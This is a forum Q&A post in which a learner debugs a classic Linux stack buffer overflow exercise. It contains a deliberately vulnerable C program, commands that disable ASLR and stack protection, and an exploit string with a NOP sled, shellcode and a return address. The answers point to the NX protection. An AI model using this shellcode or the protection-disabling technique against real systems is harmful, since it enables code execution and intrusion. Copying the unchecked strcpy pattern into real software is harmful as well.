# Buffer Overflow Should Work, But Gives SIGSEGV Error

Tags: c, stack, buffer-overflow

I was watching a tutorial on how to do a buffer overflow on linux. Everything was working great until I tried running the final thing. I searched and search on google but found nothing that worked.

My Buffer Overflow Exploitable C Code (exploitable.c):

```
#include <string.h>

int main(int argc, char** argv)
{
    char buf[500];
    strcpy(buf, argv[1]);
    return 0;
}
```

How I compiled:

1. I removed the randomization of the va_space (not really sure what it does, but I know that it allows for the buffer overflow): `echo 0 > /proc/sys/kernel/randomize_va_space`
2. I compiled using this command: `gcc -fno-stack-protector -mpreferred-stack-boundary=2 -o exploitable exploitable.c`
3. I ran it using gdb and figured out that this command should get me a `/bin/bash` shell:

   `./exploitable $(ruby -e 'print "\x90" * 212 + "\xbb\xac\x02\x93\xb0\xda\xdb\xd9\x74\x24\xf4\x5a\x29\xc9" + "\xb1\x0e\x31\x5a\x15\x83\xc2\x04\x03\x5a\x11\xe2\x59\x33" + "\x5a\x81\x7a\xc3\xbf\x52\xd8\xe1\xc0\xf9\x2b\xa2\x59\xaf" + "\x4d\x3a\x77\x33\x18\x5d\xef\x9c\x69\xca\xf0\x8a\xa2\x68" + "\x98\x24\x35\x8f\x08\x51\x4f\x50\xad\xa1\x60\x32\xc4\xcf" + "\x51\xd0\x77\x63\xc5\x14\x2f\xd0\x9c\xf4\x02\x56" + "\x90" * 210 + "\x44\xf1\xff\xbf"')`

However this does not work.

Running it in gdb I find that the `$eip` was properly set to `0xbffff144`(the middle of my first round of nops). For some reason this gives me a SIGSEGV error:

[image: My output from gdb after running the command above]

I don't know whether I have done something wrong or if there is one more fail safe I have to turn off.

Answer (score 3, accepted):

Perhaps gcc option (for the linker) `-z execstack` to disable NX.

Comment: Man I am stupid...How could I forget that! Do you know of any way to make this work without NX and preferably without any of the other compiler things, because I do not know of many people who compile their C programs like this.

Answer (score 0):

You should make the stack executable. That could be part of your problem.

Also if you want a good reference on buffer overflows, I suggest reading [Smashing the Stack for Fun and Profit](http://insecure.org/stf/smashstack.html)